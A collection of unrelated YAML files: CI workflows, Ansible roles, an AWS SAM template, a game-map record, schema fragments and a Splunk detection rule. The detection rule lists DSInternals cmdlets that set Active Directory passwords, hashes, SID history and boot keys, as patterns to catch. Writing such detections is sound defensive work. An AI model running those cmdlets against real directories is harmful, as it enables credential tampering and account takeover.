operations: CRUD
presence: optional
type: boolean
bgpaas_session_attributes:
$ref: types.json#/definitions/BgpSessionAttributes
description: BGP peering session attributes.
operations: CRUD
presence: required
bgpaas_shared:
default: false
description: True if only one BGP router needs to be created. Otherwise, one
BGP router is created for each VMI
operations: CRUD
presence: optional
type: boolean
bgpaas_suppress_route_advertisement:
description: True when server should not advertise any routes to the client
i.e. the client has static routes (typically a default) configured.
operations: CRUD
presence: optional
type: boolean
required:
- autonomous_system
- bgpaas_ip_address
- bgpaas_session_attributes
type: object
|
schema/yaml/bgp-as-a-service-schema.yml
|
---
name: CI
on: [push]
jobs:
markdown_lint:
name: "Lint Markdown"
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
- name: Setup Ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: head
- name: Install mdl
run: gem install mdl
- name: Lint markdown
run: mdl --ignore-front-matter --style .mdl_style.rb ./
markdown_link_check:
name: "Check Markdown links"
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
- name: Check links
uses: gaurav-nelson/github-action-markdown-link-check@1.0.13
with:
use-verbose-mode: "yes"
hugo:
name: "Hugo build"
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
with:
submodules: 'recursive'
- name: Setup Hugo
uses: peaceiris/actions-hugo@v2
with:
hugo-version: 'latest'
extended: true
- name: Build
run: hugo --minify
html-proofer-internal-links:
name: "HTML proofer internal links"
runs-on: ubuntu-latest
needs: hugo
steps:
- name: Checkout
uses: actions/checkout@v2
with:
submodules: 'recursive'
- name: Setup Hugo
uses: peaceiris/actions-hugo@v2
with:
hugo-version: 'latest'
extended: true
- name: Setup Ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: head
- name: Install html-proofer
run: gem install html-proofer
- name: Build
run: hugo --minify
- name: Run html-proofer
# swap URLs
# - adjust for base URL (a-fully-on-chain-reading-group)
# Ignore internal links to base URL
# Only check internal links
run: |
htmlproofer ./public \
--check-favicon \
--check-html \
--check-img-http \
--disable-external \
--url-swap "^/a-fully-on-chain-reading-group/:/" \
--url-ignore '/a-fully-on-chain-reading-group'
html-proofer-external-links:
name: "HTML proofer external links"
runs-on: ubuntu-latest
needs: hugo
steps:
- name: Checkout
uses: actions/checkout@v2
with:
submodules: 'recursive'
- name: Setup Hugo
uses: peaceiris/actions-hugo@v2
with:
hugo-version: 'latest'
extended: true
      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
        with:
          ruby-version: head
- name: Install html-proofer
run: gem install html-proofer
- name: Build
run: hugo --minify
- name: Run html-proofer
# swap URLs
# - adjust for internal links with fqdn (http://christinaLast.github.io/a-fully-on-chain-reading-group)
# - Adjust edit and tree paths on GitHub to current branch (*/edit/main, */tree/main)
# Only check external links
run: |
htmlproofer ./public \
--check-favicon \
--check-html \
--check-img-http \
--enforce-https \
--external-only \
            --url-swap "^https\://ChristinaLast.github.io/a-fully-on-chain-reading-group/:/,/edit/main:/edit/$(git branch --show-current),/tree/main:/tree/$(git branch --show-current)"
|
.github/workflows/ci.yaml
|
client:
autoDeserialize:
receiveBearerTokenAliasExample:
- '""'
receiveBearerTokenExample:
- '{"value":" space"}'
- '{"value":"space "}'
- '{"value":"with space"}'
- '{"value":""}'
- '{"value":"#"}'
- '{"value":" "}'
- '{"value":"("}'
- '{"value":"="}'
- '{"value":"=a"}'
receiveDateTimeAliasExample:
- '""'
- '"4/3/2018"'
- '"1523040070"'
- '"2017-01-02T03:04:05.0000000000Z"'
- '"2017-01-02T04:04:05.000000000+01:00[Europe/Berlin]"'
receiveDateTimeExample:
- '{"value":"4/3/2018"}'
- '{"value":"1523040070"}'
- '{"value":"2017-01-02T03:04:05.0000000000Z"}'
- '{"value":"2017-01-02T04:04:05.000000000+01:00[Europe/Berlin]"}'
receiveDoubleExample:
- '{"value":"1.23"}'
- '{"value":"nan"}'
receiveDoubleAliasExample:
- '"nan"'
- '"NAN"'
- '"infinity"'
- '"-infinity"'
- '"+Infinity"'
# We do not round trip enums, or check for illegal characters
receiveEnumExample:
- '"THIS_IS_UNKNOWN"'
- '"!!!"'
- '"one-hundred"'
receiveMapEnumExampleAlias:
- '{"ONE": "", "TWO": "", "UNKNOWN_VARIANT": ""}'
# We do not encode boolean keys correctly, we encode them as True/False instead of true/false
receiveMapBooleanAliasExample:
- '{"true": true}'
# We do not fail on duplicate map keys
receiveMapDoubleAliasExample:
- '{"10": true, "10e0": false}'
- '{"10": true, "10.0": false}'
# python int range is over-permissive compared to spec
receiveIntegerExample:
- '{"value":-2147483649}'
- '{"value":2147483648}'
receiveRidAliasExample:
- '"badString"'
- '"ri.service.CAPLOCK.type.name"'
- '"ri.service.instance.-123.name"'
- '"ri..instance.type.noService"'
- '"ri.service.instance.type."'
- '"id.bad.id.class.b.name"'
- '"ri:service::instance:type:name"'
- '"ri.service.instance.type.name!@#"'
- '"ri.service(name)..folder.foo"'
- '""'
receiveRidExample:
- '{"value":""}'
- '{"value":"badString"}'
- '{"value":"ri.service.CAPLOCK.type.name"}'
- '{"value":"ri.service.instance.-123.name"}'
- '{"value":"ri..instance.type.noService"}'
- '{"value":"ri.service.instance.type."}'
- '{"value":"id.bad.id.class.b.name"}'
- '{"value":"ri:service::instance:type:name"}'
- '{"value":"ri.service.instance.type.name!@#"}'
- '{"value":"ri.service(name)..folder.foo"}'
receiveSafeLongAliasExample:
- "-9007199254740992"
- '9007199254740992'
receiveSafeLongExample:
- '{"value":-9007199254740992}'
- '{"value":9007199254740992}'
receiveSetStringExample:
- '{"value":["a","a"]}'
receiveUuidAliasExample:
- '""'
- '"80e6dd13-5f42-4e33-ad18"'
receiveUuidExample:
- '{"value":""}'
- '{"value":"80e6dd13-5f42-4e33-ad18"}'
# Optional arguments are ordered differently, causing the wrong parameters to be passed
singleHeaderService:
headerOptionalOfString:
- 'null'
- '"foo"'
singlePathParamService:
pathParamBoolean:
- 'true'
- 'false'
pathParamString:
- '""' # The server doesn't accept empty path params
pathParamAliasString:
- '""' # The server doesn't accept empty path params
singleQueryService: {}
|
resources/ignored_test_cases.yml
|
main:
# - title: "Home"
# url: https://diogocaetanogarcia.github.io/minimal-mistakes/
# - title: "Point clouds"
# url: /point-clouds/
# - title: "Video compression"
# url: /video-compression/
# - title: "Miscellaneous"
# url: /miscellaneous/
# - title: "Software"
# url: /software/
- title: "Faculty"
url: /faculty/
- title: "Graduate students"
url: /grad-students/
- title: "Undergraduate students"
url: /undergrad-students/
- title: "Alumni"
url: /alumni/
projs:
- title: "Point clouds"
url: /point-clouds/
children:
- title: "Attribute compression"
url: /point-clouds-attribute-compression/
- title: "Geometry compression"
url: /point-clouds-geometry-compression/
- title: "Motion estimation"
url: /point-clouds-motion-estimation/
- title: "Region-of-interest/saliency"
url: /point-clouds-roi-saliency/
- title: "Super-resolution"
url: /point-clouds-super-resolution/
- title: "Image and video compression"
url: /video-compression/
children:
- title: "Learning-based image and video compression"
url: /video-compression-learning-based/
- title: "Wedges"
url: /video-compression-wedges/
- title: "Light field image compression"
url: /video-compression-light-field-image-compression/
- title: "Video encoding complexity reduction"
url: /video-compression-video-encoding-complexity-reduction/
- title: "Wyner-Ziv coding"
url: /video-compression-wyner-ziv-coding/
- title: "Enhancement and super-resolution"
url: /video-compression-enhancement-super-resolution/
- title: "Scanned document compression"
url: /video-compression-scanned-document-compression/
- title: "Transcoding"
url: /video-compression-transcoding/
- title: "Motion estimation and intra prediction"
url: /video-compression-motion-estimation-and-intra-prediction/
- title: "Brazilian digital TV standard"
url: /video-compression-brazilian-digital-tv-standard/
- title: "Image and video processing, analysis and synthesis"
url: /miscellaneous/
children:
- title: "JPEG detection"
url: /miscellaneous-jpeg-detection/
- title: "Recolorization"
url: /miscellaneous-recolorization/
- title: "Face spoofing detection"
url: /miscellaneous-face-spoofing-detection/
- title: "Heart-rate measurement"
url: /miscellaneous-heart-rate-measurement/
- title: "Sonar multibeam echo sounding"
url: /miscellaneous-sonar-multibeam-echo-sounding/
# - title: "Quick-Start Guide"
# url: https://mmistakes.github.io/minimal-mistakes/docs/quick-start-guide/
# - title: "About"
# url: https://mmistakes.github.io/minimal-mistakes/about/
# - title: "Sample Posts"
# url: /year-archive/
# - title: "Sample Collections"
# url: /collection-archive/
# - title: "Sitemap"
# url: /sitemap/
|
_data/navigation.yml
|
language: cpp
dist: xenial
# see https://github.com/nlohmann/json/blob/develop/.travis.yml
matrix:
include:
# g++-8
- os: linux
compiler: gcc
env:
- COMPILER=g++-8
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=11"
addons:
apt:
sources: ['ubuntu-toolchain-r-test']
packages: ['g++-8']
- os: linux
compiler: gcc
env:
- COMPILER=g++-8
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=14"
addons:
apt:
sources: ['ubuntu-toolchain-r-test']
packages: ['g++-8']
- os: linux
compiler: gcc
env:
- COMPILER=g++-8
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=17"
addons:
apt:
sources: ['ubuntu-toolchain-r-test']
packages: ['g++-8']
# g++-8 32bit
- os: linux
compiler: gcc
env:
- COMPILER=g++-8
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=11"
- CXXFLAGS="-m32"
- LDFLAGS="-m32"
addons:
apt:
sources: ['ubuntu-toolchain-r-test']
packages: ['g++-8-multilib', 'linux-libc-dev:i386']
- os: linux
compiler: gcc
env:
- COMPILER=g++-8
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=14"
- CXXFLAGS="-m32"
- LDFLAGS="-m32"
addons:
apt:
sources: ['ubuntu-toolchain-r-test']
packages: ['g++-8-multilib', 'linux-libc-dev:i386']
- os: linux
compiler: gcc
env:
- COMPILER=g++-8
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=17"
- CXXFLAGS="-m32"
- LDFLAGS="-m32"
addons:
apt:
sources: ['ubuntu-toolchain-r-test']
packages: ['g++-8-multilib', 'linux-libc-dev:i386']
# clang++-6.0
- os: linux
compiler: clang
env:
- COMPILER=clang++-6.0
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=11"
addons:
apt:
sources: ['ubuntu-toolchain-r-test', 'llvm-toolchain-xenial-6.0']
packages: ['g++-6', 'clang-6.0',]
- os: linux
compiler: clang
env:
- COMPILER=clang++-6.0
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=14"
addons:
apt:
sources: ['ubuntu-toolchain-r-test', 'llvm-toolchain-xenial-6.0']
packages: ['g++-6', 'clang-6.0',]
- os: linux
compiler: clang
env:
- COMPILER=clang++-6.0
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=17"
addons:
apt:
sources: ['ubuntu-toolchain-r-test', 'llvm-toolchain-xenial-6.0']
packages: ['g++-6', 'clang-6.0',]
install:
- if [[ "${CODE_COVERAGE}" == "true" ]]; then gem install coveralls-lcov ; fi
script:
# make sure CXX is correctly set
- if [[ "${COMPILER}" != "" ]]; then export CXX=${COMPILER}; fi
# show OS/compiler version
- uname -a
- $CXX --version
# build
- cd build
- cmake .. -DCMAKE_BUILD_TYPE=Release ${CMAKE_OPTIONS} && cmake --build . -- -j2
# check file
- file ./nb
# run test
- ./nb
# coverage
- |
if [[ "${CODE_COVERAGE}" = "true" ]]; then
cmake --build . --target lcov
fi
|
.travis.yml
|
name: Continuous Integration
on:
push:
branches:
- trunk
- releases/*
pull_request:
branches:
- trunk
- releases/*
env:
DOTNET_SKIP_FIRST_TIME_EXPERIENCE: true
DOTNET_CLI_TELEMETRY_OPTOUT: true
jobs:
gitversion:
name: Calculate SemVer
runs-on: ubuntu-latest
outputs:
fullSemVer: ${{ steps.gitversion.outputs.fullSemVer }}
steps:
- name: Checkout
uses: actions/checkout@v2.3.4
with:
fetch-depth: 0
- name: Install GitVersion
uses: gittools/actions/gitversion/setup@v0.9.9
with:
versionSpec: 5.x
- name: Determine Version
id: gitversion
uses: gittools/actions/gitversion/execute@v0.9.9
with:
useConfigFile: true
configFilePath: gitversion.yml
build:
name: Build & Package
needs: gitversion
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2.3.4
- name: Setup .NET
uses: actions/setup-dotnet@v1.8.0
with:
dotnet-version: 5.0.x
- name: Restore dependencies
run: dotnet restore
- name: Build
run: dotnet build --no-restore -c Release -p:Version=${{ needs.gitversion.outputs.fullSemVer }}
- name: Pack
run: dotnet pack --no-build -c Release -o packages -p:PackageVersion=${{ needs.gitversion.outputs.fullSemVer }} --include-symbols -p:SymbolPackageFormat=snupkg
- name: Upload packages artifacts
uses: actions/upload-artifact@v2
with:
name: packages
path: packages
test:
name: Run unit tests
needs: gitversion
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2.3.4
- name: Setup .NET
uses: actions/setup-dotnet@v1.8.0
with:
dotnet-version: 5.0.x
- name: Restore dependencies
run: dotnet restore
- name: Build
run: dotnet build --no-restore -c Release -p:Version=${{ needs.gitversion.outputs.fullSemVer }}
- name: Install AzCopy
uses: kheiakiyama/install-azcopy-action@v1.0.3
with:
version: v10
- name: Determine test run filter
uses: haya14busa/action-cond@v1.0.2
id: test_run_filter
with:
if_true: 'Category=UnitTest|Category=IntegrationTest'
if_false: 'Category=UnitTest'
cond: ${{ github.event.sender.login != 'dependabot[bot]' && ( github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name == github.repository ) }}
- name: Test
run: |
dotnet test --no-build -c Release \
--settings coverlet.runsettings \
--logger "junit;LogFilePath=../../tests-results/{assembly}.junit.xml" \
--collect "XPlat Code Coverage" \
--results-directory tests-results \
--filter "$TEST_FILTER"
env:
TEST_FILTER: ${{ steps.test_run_filter.outputs.value }}
          # NOTE(review): env var names containing ':' are not valid in bash on Linux
          # runners; the .NET config convention is '__' (e.g. Email__Provider__Parameters__Key).
          # Verify these keys are actually picked up by the test process — TODO confirm.
          Email:Provider:Parameters:Key: ${{ secrets.SENDGRIDKEY }}
ConnectionStrings:ConnectionStringFromAppSettings: ${{ secrets.AZURESTORAGETESTSCONNECTIONSTRING }}
Storage:Providers:CustomConnectionString:ConnectionString: ${{ secrets.AZURESTORAGETESTSCONNECTIONSTRING }}
Storage:Stores:CustomConnectionString:ConnectionString: ${{ secrets.AZURESTORAGETESTSCONNECTIONSTRING }}
Storage:ScopedStores:ScopedCustomConnectionString:ConnectionString: ${{ secrets.AZURESTORAGETESTSCONNECTIONSTRING }}
AzCopy10Command: azcopy_v10
- name: Install ReportGenerator
run: dotnet tool install --global dotnet-reportgenerator-globaltool --version 4.8.8
- name: Merge lcov files
run: reportgenerator -reports:tests-results/**/*.info -targetdir:tests-results -reporttypes:lcov
- name: Upload tests results artifacts
uses: actions/upload-artifact@v2
with:
name: tests-results
path: tests-results
if: ${{ always() }}
- name: Publish unit tests results
uses: EnricoMi/publish-unit-test-result-action@v1.17
if: >
always() &&
github.event.sender.login != 'dependabot[bot]' &&
( github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name == github.repository )
with:
files: tests-results/*.junit.xml
check_name: Unit tests results
- name: Upload coverage to Coveralls
uses: coverallsapp/github-action@v1.1.2
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
path-to-lcov: ./tests-results/lcov.info
|
.github/workflows/continuous-integration.yml
|
---
- name: load version vars
with_first_found:
- '../vars/versions/{{ cm_version }}.yml'
- ../vars/versions/main.yml
include_vars: '{{ item }}'
- name: assert version vars
assert:
that:
- "cm_redis_sha256sum not in (None, '')"
- name: create download directory
file:
state: directory
mode: 'u=rwx,go=rx'
dest: '{{ cm_download_dir }}'
- name: download Camunda-Modeler
get_url:
url: '{{ cm_download_url }}/{{ cm_redis_filename }}'
dest: '{{ cm_download_dir }}/{{ cm_redis_filename }}'
    checksum: 'sha256:{{ cm_redis_sha256sum }}'
force: no
mode: 'u=rw,go=r'
- name: "create {{ cm_install_dir }} installation directory"
become: yes
file:
state: directory
owner: root
group: root
mode: 'u=rwx,go=rx'
dest: '{{ cm_install_dir }}'
- name: install unarchive dependencies (zypper)
become: yes
zypper:
name:
- gzip
- tar
state: present
when: ansible_pkg_mgr == 'zypper'
- name: install Camunda-Modeler
become: yes
unarchive:
src: '{{ cm_download_dir }}/{{ cm_redis_filename }}'
remote_src: yes
extra_opts: '--strip-components=1'
dest: '{{ cm_install_dir }}'
owner: root
group: root
mode: 'u=rwx,go=rx'
# Set Camunda-Modeler facts
- name: create Ansible facts.d directory
become: yes
file:
state: directory
dest: /etc/ansible/facts.d
owner: root
group: root
mode: 'u=rwx,go=rx'
- name: install Camunda-Modeler facts
become: yes
template:
src: facts.j2
dest: /etc/ansible/facts.d/camundamodeler.fact
owner: root
group: root
mode: 'u=rw,go=r'
- name: re-read facts
setup:
filter: ansible_local
- name: install Camunda-Modeler link
become: yes
file:
state: link
src: '{{ cm_install_dir }}/camunda-modeler'
dest: '/usr/local/bin/camunda-modeler'
- name: install Camunda-Modeler desktop file
become: yes
template:
src: camunda-modeler.desktop.j2
dest: '/usr/share/applications/camunda-modeler.desktop'
owner: root
group: root
mode: 'u=rw,go=r'
|
tasks/main.yaml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2018-10-16 18:43"
game: "Unreal Tournament"
name: "CTF-Watercourse"
author: "zaupau32"
description: "None"
releaseDate: "2006-08"
attachments:
- type: "IMAGE"
name: "CTF-Watercourse_shot_4.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/CTF-Watercourse_shot_4.png"
- type: "IMAGE"
name: "CTF-Watercourse_shot_3.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/CTF-Watercourse_shot_3.png"
- type: "IMAGE"
name: "CTF-Watercourse_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/CTF-Watercourse_shot_1.png"
- type: "IMAGE"
name: "CTF-Watercourse_shot_2.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/CTF-Watercourse_shot_2.png"
originalFilename: "ctf-watercourse.zip"
hash: "90425b51f500bb5de934638a6f9cd2c3e562064c"
fileSize: 441164
files:
- name: "CTF-Watercourse.unr"
fileSize: 1413687
hash: "e08f7cb6d6bc926b114e835acd28bfa1a426a6e7"
otherFiles: 4
dependencies: {}
downloads:
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/ctf-watercourse.zip"
main: true
repack: false
state: "OK"
- url: "http://www.ut-files.com/index.php?dir=Maps/CTF/MapsW/&file=ctf-watercourse.zip"
main: false
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Maps/CTF&file=ctf-watercourse.zip"
main: false
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Maps/CTF/MapsW/ctf-watercourse.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/9/0/425b51/ctf-watercourse.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/9/0/425b51/ctf-watercourse.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "Capture The Flag"
title: "Guarded Watercourse"
playerCount: "4-8"
themes:
Industrial: 0.7
Ancient: 0.3
bots: true
|
content/Unreal Tournament/Maps/Capture The Flag/W/9/0/425b51/ctf-watercourse_[90425b51].yml
|
AWSTemplateFormatVersion: '2010-09-09'
Transform: 'AWS::Serverless-2016-10-31'
Description: An AWS Lambda application that uses Amazon CloudWatch Logs, AWS X-Ray, and AWS CloudFormation custom resources.
Globals:
Function:
Runtime: nodejs12.x
Handler: index.handler
Tracing: Active
Layers:
- !Ref libs
Resources:
bucket:
Type: AWS::S3::Bucket
DeletionPolicy: Retain
role:
Type: AWS::IAM::Role
Properties:
AssumeRolePolicyDocument:
Version: "2012-10-17"
Statement:
-
Effect: Allow
Principal:
Service:
- lambda.amazonaws.com
Action:
- sts:AssumeRole
ManagedPolicyArns:
- arn:aws:iam::aws:policy/AWSXrayFullAccess
- arn:aws:iam::aws:policy/AmazonS3FullAccess
- arn:aws:iam::aws:policy/CloudWatchLogsFullAccess
- arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole
- arn:aws:iam::aws:policy/service-role/AWSLambdaRole
Path: /service-role/
processor:
Type: AWS::Serverless::Function
Properties:
CodeUri: processor/.
Description: Retrieve logs and trace for errors.
Timeout: 40
Role: !GetAtt role.Arn
Environment:
Variables:
bucket: !Ref bucket
libs:
Type: AWS::Serverless::LayerVersion
Properties:
LayerName: error-processor-lib
Description: Dependencies for the error-processor sample app.
ContentUri: lib/.
CompatibleRuntimes:
- nodejs12.x
randomerror:
Type: AWS::Serverless::Function
Properties:
CodeUri: random-error/.
Description: Generate errors.
Timeout: 600
Role: !GetAtt role.Arn
primer:
Type: AWS::Serverless::Function
Properties:
InlineCode: |
var aws = require('aws-sdk')
var response = require('cfn-response')
exports.handler = async function(event, context) {
console.log("REQUEST RECEIVED:\n" + JSON.stringify(event))
// For Delete requests, immediately send a SUCCESS response.
if (event.RequestType == "Delete") {
return await response.send(event, context, "SUCCESS")
}
var responseStatus = "FAILED"
var responseData = {}
var functionName1 = event.ResourceProperties.FunctionName1
var functionName2 = event.ResourceProperties.FunctionName2
var functionName3 = event.ResourceProperties.FunctionName3
var logGroup1 = "/aws/lambda/" + functionName1
var logGroup2 = "/aws/lambda/" + functionName2
var logGroup3 = "/aws/lambda/" + functionName3
var lambda = new aws.Lambda()
var logs = new aws.CloudWatchLogs()
try {
// Invoke other functions and wait for log groups to populate
await Promise.all([
lambda.invoke({ FunctionName: functionName2 }).promise(),
lambda.invoke({ FunctionName: functionName3 }).promise(),
new Promise(resolve => setTimeout(resolve, 10000))
])
// Set log retention on all log groups
await Promise.all([
logs.putRetentionPolicy({logGroupName: logGroup1, retentionInDays: 3 }).promise(),
logs.putRetentionPolicy({logGroupName: logGroup2, retentionInDays: 3 }).promise(),
logs.putRetentionPolicy({logGroupName: logGroup3, retentionInDays: 3 }).promise()
])} catch(err) {
responseData = {Error: "SDK call failed"}
console.log(responseData.Error + ":\n", err)
return await response.send(event, context, responseStatus, responseData)
}
responseStatus = "SUCCESS"
return await response.send(event, context, responseStatus, responseData)
}
Description: Invoke a function to create a log stream.
Role: !GetAtt role.Arn
Timeout: 30
primerinvoke:
Type: AWS::CloudFormation::CustomResource
Version: "1.0"
Properties:
ServiceToken: !GetAtt primer.Arn
FunctionName1: !Ref primer
FunctionName2: !Ref randomerror
FunctionName3: !Ref processor
subscription:
Type: AWS::Logs::SubscriptionFilter
DependsOn: cloudwatchlogspermission
Properties:
LogGroupName: !Join [ "/", [ "/aws/lambda", !Ref randomerror ] ]
FilterPattern: ERROR
DestinationArn: !GetAtt processor.Arn
cloudwatchlogspermission:
Type: AWS::Lambda::Permission
# Wait for randomerror to be invoked to ensure that the log stream exists.
DependsOn: primerinvoke
Properties:
FunctionName: !GetAtt processor.Arn
Action: lambda:InvokeFunction
Principal: !Join [ ".", [ "logs", !Ref "AWS::Region", "amazonaws.com" ] ]
SourceAccount: !Ref AWS::AccountId
|
documents/aws-lambda-developer-guide/sample-apps/error-processor/template.yml
|
---
- name: Pre hooks
include: '{{ lookup("task_src", "roundcube/pre_main.yml") }}'
# ---- Environment ----
- name: Get version of current Roundcube installation
  command: >-
    sed -n "s/^define('RCMAIL_VERSION', '\(.*\)');/\1/p"
    {{ roundcube__git_checkout }}/program/include/iniset.php
args:
warn: False
changed_when: False
failed_when: False
register: roundcube__register_version
tags: [ 'role::roundcube:database' ]
# this task is necessary, to trigger proper database upgrades after
# updating the role to v0.2.0 because the default installation path
# has changed.
- name: Get version of deprecated Roundcube installation on role upgrade
  command: >-
    sed -n "s/^define('RCMAIL_VERSION', '\(.*\)');/\1/p"
    /srv/www/roundcube/sites/{{ roundcube__domain if roundcube__domain is string
    else roundcube__domain[0] }}/public/program/include/iniset.php
args:
warn: False
changed_when: False
failed_when: False
register: roundcube__register_version_old
when: (not roundcube__register_version.stdout|d()) and
(not roundcube__git_checkout == '/srv/www/roundcube/sites/'
+ (roundcube__domain if roundcube__domain is string
else roundcube__domain[0]) + '/public')
tags: [ 'role::roundcube:database' ]
# ---- Deployment ----
- name: Install pre-requisite packages for Roundcube
package:
name: '{{ q("flattened", (roundcube__base_packages
+ roundcube__packages)) }}'
state: 'present'
register: roundcube__register_packages
until: roundcube__register_packages is succeeded
tags: [ 'role::roundcube:pkg' ]
- include: deploy_roundcube.yml
tags: [ 'role::roundcube:deployment' ]
# ---- Configuration ----
- name: Make sure database directory exists
file:
path: '{{ roundcube__git_checkout }}/{{ roundcube__database_map[roundcube__database].dbname | dirname }}'
state: directory
owner: '{{ roundcube__user }}'
group: '{{ roundcube__group }}'
mode: '0750'
when: roundcube__database_map[roundcube__database].dbtype == 'sqlite'
tags: [ 'role::roundcube:database' ]
- include: configure_mysql.yml
when: roundcube__database_map[roundcube__database].dbtype == 'mysql'
tags: [ 'role::roundcube:database' ]
- name: Configure Roundcube
template:
src: 'srv/www/sites/config.inc.php.j2'
dest: '{{ roundcube__git_checkout + "/config/config.inc.php" }}'
owner: 'root'
group: '{{ roundcube__group }}'
mode: '0640'
tags: [ 'role::roundcube:config' ]
- name: Update database schema
command: 'php bin/updatedb.sh --package=roundcube --dir={{ roundcube__git_checkout }}/SQL'
args:
chdir: '{{ roundcube__git_checkout }}'
become: True
become_user: '{{ roundcube__user }}'
register: roundcube__register_updatedb
changed_when: roundcube__register_updatedb.stdout|d()
when: (roundcube__register_version.stdout|d() and
roundcube__git_version is version_compare(roundcube__register_version.stdout, '>')) or
(roundcube__register_version_old is not skipped and
roundcube__register_version_old.stdout|d())
tags: [ 'role::roundcube:database' ]
- name: Post hooks
include: '{{ lookup("task_src", "roundcube/post_main.yml") }}'
|
repo-github/debops@debops/ansible/roles/debops.roundcube/tasks/main.yml
|
author: <NAME>, Splunk
date: '2020-11-03'
description: This detection identifies illegal setting of credentials via DSInternals
modules.
eli5: This detection identifies use of DSInternals modules that set credentials illegally.
how_to_implement: You must be ingesting Windows Security logs from devices of interest,
including the event ID 4688 with enabled command line logging.
id: d5ef590f-9bde-49eb-9c63-2f5b62a65b9c
known_false_positives: None identified.
name: Setting Credentials via DSInternals modules
references:
- https://github.com/MichaelGrafnetter/DSInternals
search: '| from read_ssa_enriched_events()
| eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)),
process_name=ucast(map_get(input_event, "process_name"), "string", null), process_path=ucast(map_get(input_event,
"process_path"), "string", null), cmd_line=ucast(map_get(input_event, "process"),
"string", null), parent_process_name=ucast(map_get(input_event, "parent_process_name"),
"string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Add-ADDBSidHistory/)=true
OR match_regex(cmd_line, /(?i)Add-ADReplNgcKey/)=true OR match_regex(cmd_line, /(?i)Set-ADDBAccountPassword/)=true
OR match_regex(cmd_line, /(?i)Set-ADDBAccountPasswordHash/)=true OR match_regex(cmd_line,
/(?i)Set-ADDBBootKey/)=true OR match_regex(cmd_line, /(?i)Set-SamAccountPasswordHash/)=true
OR match_regex(cmd_line, /(?i)Set-AzureADUserEx/)=true )
| eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event,
"dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"),
"string", null)), body = "TBD" | into write_ssa_detected_events();'
tags:
asset_type: Windows
cis20:
- CIS 16
- CIS 20
kill_chain_phases:
- Actions on Objectives
mitre_technique_id:
- T1068
- T1078
- T1098
nist:
- PR.AC
- PR.IP
product:
- UEBA for Security Cloud
required_fields:
- dest_device_id
- process_name
- parent_process_name
- _time
- process_path
- dest_user_id
- process
risk_severity: high
security_domain: endpoint
type: SSA
version: 1
|
detections/endpoint/ssa___setting_credentials_via_dsinternals_modules.yml
|
composable_scenario: scenario009-multinode.yaml
deployed_server: true
network_isolation: false
enable_pacemaker: false
overcloud_ipv6: false
containerized_undercloud: true
containerized_overcloud: true
# This enables TLS for the undercloud which will also make haproxy bind to the
# configured public-vip and admin-vip.
undercloud_generate_service_certificate: false
undercloud_enable_validations: false
# This enables the deployment of the overcloud with SSL.
ssl_overcloud: false
# Centos Virt-SIG repo for atomic package
add_repos:
# NOTE(trown) The atomic package from centos-extras does not work for
# us but its version is higher than the one from the virt-sig. Hence,
# using priorities to ensure we get the virt-sig package.
- type: package
pkg_name: yum-plugin-priorities
- type: generic
reponame: quickstart-centos-paas
filename: quickstart-centos-paas.repo
baseurl: https://buildlogs.centos.org/centos/7/paas/x86_64/openshift-origin311/
- type: generic
reponame: quickstart-centos-virt-container
filename: quickstart-centos-virt-container.repo
baseurl: https://buildlogs.centos.org/centos/7/virt/x86_64/container/
includepkgs:
- atomic
priority: 1
extra_args: ''
container_args: >-
{% if release in ['pike','queens'] -%}
-e {{ overcloud_templates_path }}/environments/docker.yaml
{%- endif -%}
{% if release in ['ocata', 'pike', 'queens', 'rocky'] %}
-e {{ working_dir }}/containers-default-parameters.yaml
{% else %}
-e {{ working_dir }}/containers-prepare-parameter.yaml
{% endif %}
-e {{ overcloud_templates_path }}/environments/openshift.yaml
# NOTE(mandre) use container images mirrored on the dockerhub to take advantage
# of the proxy setup by openstack infra
docker_openshift_etcd_namespace: docker.io/tripleomaster
